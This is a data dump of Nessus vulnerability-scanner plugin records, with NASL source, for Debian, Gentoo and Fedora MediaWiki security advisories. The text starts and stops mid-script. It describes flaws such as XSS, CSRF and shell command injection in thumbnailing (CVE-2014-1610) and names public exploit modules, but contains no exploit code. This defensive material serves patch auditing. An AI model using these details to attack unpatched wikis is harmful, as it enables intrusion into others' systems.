(report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.10 / 1.21.4 / 1.22.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:53", "description": "It was discovered that MediaWiki, a website engine for collaborative work, is vulnerable to JSONP injection in Flash (CVE-2014-5241 ) and clickjacking between OutputPage and ParserOutput (CVE-2014-5243 ). The vulnerabilities are addressed by upgrading MediaWiki to the new upstream version 1.19.18, which includes additional changes.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-25T00:00:00", "type": "nessus", "title": "Debian DSA-3011-1 : mediawiki - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mediawiki", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3011.NASL", "href": "https://www.tenable.com/plugins/nessus/77358", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3011. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77358);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5243\");\n script_bugtraq_id(69136, 69137);\n script_xref(name:\"DSA\", value:\"3011\");\n\n script_name(english:\"Debian DSA-3011-1 : mediawiki - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241 ) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243 ). The\nvulnerabilities are addressed by upgrading MediaWiki to the new\nupstream version 1.19.18, which includes additional changes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=752622\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=758510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-5241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-5243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mediawiki\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3011\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mediawiki packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1:1.19.18+dfsg-0+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.18+dfsg-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:55", "description": "The remote Debian host is missing a security update. It is, therefore, affected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to a failure to validate input before returning it to the user. An unauthenticated, remote attacker can exploit this, via specially crafted SVG files, to execute arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to two different tools being used to block password change requests, these being Special:PasswordReset and Special:ChangePassword, either of which may be bypassed by the method the other prevents. A remote attacker can exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit these to bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the same session ID within HTTP headers. A remote attacker can exploit this to authenticate as another random user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the /includes/libs/XmlTypeCheck.php script due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted XSL file, to execute arbitrary script code in the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php script due to a failure to apply SVG sanitization when XML files are read as invalid. An unauthenticated, remote attacker can exploit this to upload non-sanitized XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site (XSS) scripting vulnerability exists in the /includes/Sanitizer.php script due to a failure to properly validate the '-o-link' attribute before returning it to users. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in the user's browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the /includes/api/ApiQueryLogEvents.php script that allows an unauthenticated, remote attacker to disclose potentially sensitive information regarding deleted pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php, DjVu.php, Bitmap.php, and ImageHandler.php scripts when DjVu or PDF file upload support is enabled due to improper sanitization of user-supplied input. An authenticated, remote attacker can exploit these, via the use of shell metacharacters, to execute execute arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists in the includes/specials/SpecialChangePassword.php script due to a failure to properly handle a correctly authenticated but unintended login attempt. An unauthenticated, remote attacker, by convincing a user to follow a specially crafted link, can exploit this to reset the user's password. (CVE-2014-2665)", "cvss3": {"score": null, "vector": null}, "published": "2014-03-31T00:00:00", "type": "nessus", "title": "Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2031", "CVE-2013-2032", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mediawiki", "p-cpe:/a:debian:debian_linux:mediawiki-extensions", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2891.NASL", "href": "https://www.tenable.com/plugins/nessus/73256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were\n# extracted from Debian Security Advisory DSA-2891\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73256);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\n \"CVE-2013-2031\",\n \"CVE-2013-2032\",\n \"CVE-2013-4567\",\n \"CVE-2013-4568\",\n \"CVE-2013-4572\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6472\",\n \"CVE-2014-1610\",\n \"CVE-2014-2665\"\n );\n script_bugtraq_id(\n 59594,\n 59595,\n 63757,\n 63760,\n 63761,\n 65003,\n 65223,\n 66600\n );\n script_xref(name:\"DSA\", value:\"2891\");\n\n script_name(english:\"Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities\");\n script_summary(english:\"Checks the dpkg output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian host is missing a security update. It is, therefore,\naffected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to\n a failure to validate input before returning it to the\n user. An unauthenticated, remote attacker can exploit\n this, via specially crafted SVG files, to execute\n arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to\n two different tools being used to block password change\n requests, these being Special:PasswordReset and\n Special:ChangePassword, either of which may be bypassed\n by the method the other prevents. A remote attacker can\n exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit these to\n bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the\n same session ID within HTTP headers. A remote attacker\n can exploit this to authenticate as another random\n user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the\n /includes/libs/XmlTypeCheck.php script due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted XSL file, to execute arbitrary script code in\n the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php\n script due to a failure to apply SVG sanitization when\n XML files are read as invalid. An unauthenticated,\n remote attacker can exploit this to upload non-sanitized\n XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site (XSS) scripting vulnerability exists\n in the /includes/Sanitizer.php script due to a failure\n to properly validate the '-o-link' attribute before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in the user's\n browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the\n /includes/api/ApiQueryLogEvents.php script that allows\n an unauthenticated, remote attacker to disclose\n potentially sensitive information regarding deleted\n pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php,\n DjVu.php, Bitmap.php, and ImageHandler.php scripts when\n DjVu or PDF file upload support is enabled due to\n improper sanitization of user-supplied input. An\n authenticated, remote attacker can exploit these, via\n the use of shell metacharacters, to execute execute\n arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n in the includes/specials/SpecialChangePassword.php\n script due to a failure to properly handle a correctly\n authenticated but unintended login attempt. An\n unauthenticated, remote attacker, by convincing a user\n to follow a specially crafted link, can exploit this to\n reset the user's password. (CVE-2014-2665)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729629\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706601\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4567\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6453\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6472\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-1610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-2665\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/mediawiki\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/mediawiki-extensions\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2014/dsa-2891\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the mediawiki packages. For the stable distribution (wheezy),\nthese issues have been fixed in version 1:1.19.14+dfsg-0+deb7u1 of the\nmediawiki package and version 3.5~deb7u1 of the mediawiki-extensions\npackage.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item(\"Host/Debian/release\"); \nif (empty_or_null(oslevel)) audit(AUDIT_OS_NOT, \"Debian\");\nif (oslevel !~ \"^7\\.\") audit(AUDIT_OS_NOT, \"Debian 7\", \"Debian \" + oslevel);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.14+dfsg-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-base\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-collection\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-geshi\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-graphviz\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-ldapauth\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-openid\", reference:\"3.5~deb7u1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n xss : TRUE,\n xsrf : TRUE,\n extra : deb_report_get()\n );\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:56", "description": "The remote host is affected by the vulnerability described in GLSA-201502-04 (MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details.\n Impact :\n\n A remote attacker may be able to execute arbitrary code with the privileges of the process, create a Denial of Service condition, obtain sensitive information, bypass security restrictions, and inject arbitrary web script or HTML.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-02-09T00:00:00", "type": "nessus", "title": "GLSA-201502-04 : MediaWiki: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244", "CVE-2014-2665", "CVE-2014-2853", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243", "CVE-2014-7199", "CVE-2014-7295", "CVE-2014-9276", "CVE-2014-9277", "CVE-2014-9475", "CVE-2014-9476", "CVE-2014-9477", "CVE-2014-9478", "CVE-2014-9479", "CVE-2014-9480", "CVE-2014-9481", "CVE-2014-9487", "CVE-2014-9507"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mediawiki", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201502-04.NASL", "href": "https://www.tenable.com/plugins/nessus/81227", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201502-04.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81227);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\", \"CVE-2014-2665\", \"CVE-2014-2853\", \"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-7199\", \"CVE-2014-7295\", \"CVE-2014-9276\", \"CVE-2014-9277\", \"CVE-2014-9475\", \"CVE-2014-9476\", \"CVE-2014-9477\", \"CVE-2014-9478\", \"CVE-2014-9479\", \"CVE-2014-9480\", \"CVE-2014-9481\", \"CVE-2014-9487\", \"CVE-2014-9507\");\n script_xref(name:\"GLSA\", value:\"201502-04\");\n\n script_name(english:\"GLSA-201502-04 : MediaWiki: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201502-04\n(MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. Please\n review the CVE identifiers and MediaWiki announcement referenced below\n for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, create a Denial of Service condition, obtain\n sensitive information, bypass security restrictions, and inject arbitrary\n web script or HTML.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-June/000155.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ef35312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201502-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MediaWiki 1.23 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.23.8'\n All MediaWiki 1.22 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.22.15'\n All MediaWiki 1.19 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.19.23'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/mediawiki\", unaffected:make_list(\"ge 1.23.8\", \"rge 1.22.15\", \"rge 1.19.23\"), vulnerable:make_list(\"lt 1.23.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MediaWiki\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:04", "description": "- Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-07T00:00:00", "type": "nessus", "title": "Fedora 20 : mediawiki-1.21.5-1.fc20 (2014-1745)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-1745.NASL", "href": "https://www.tenable.com/plugins/nessus/72376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-1745.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72376);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"FEDORA\", value:\"2014-1745\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.21.5-1.fc20 (2014-1745)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1058981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/127948.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be80f243\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + 